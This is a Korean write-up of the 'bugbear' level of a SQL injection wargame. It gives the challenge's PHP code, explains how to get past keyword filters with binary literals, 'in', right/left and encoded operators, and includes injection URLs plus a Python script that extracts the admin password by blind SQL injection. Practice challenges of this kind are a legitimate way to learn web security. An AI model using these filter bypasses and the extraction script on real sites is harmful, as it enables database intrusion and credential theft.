query : {$query}
";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "Hello {$result[id]}
";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>pw에는 ' 필터링 되어있다.
no에는 ' substr ascii = or and 공백 like 0x 가 필터링되어있다.
substr 필터링->right left 이용
like와 =이 모두 필터링 되었으므로 in을 사용!
0x가 필터링되었으므로 0b를 이용!
and 필터링-> %26%26
or 필터링->||
Blind SQL injection으로 패스워드 길이와 패스워드 자체를 알아낸다!
?pw=1&no=123||id%0din%0d(0b0110000101100100011011010110100101101110)%26%26length(pw)in(8)
?pw=1&no=123||id%0din%0d(0b0110000101100100011011010110100101101110)%26%26right(left(pw,3),1)>char(50)
import requests
def main():
cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}
query='https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php'
for i in range(1,9):
x=30
while(1):
x+=1
query_add=query+"?pw=1&no=123||id%0din%0d(0b0110000101100100011011010110100101101110)%26%26right(left(pw,"+str(i)+"),1)>char("+str(x)+")"
result=requests.get(query_add, cookies=cookie)
if(result.text.find("Hello")>1000):
print("GOOD "+str(i)+": "+chr(x))
break
# print(str(x))
if(__name__=="__main__"):
main()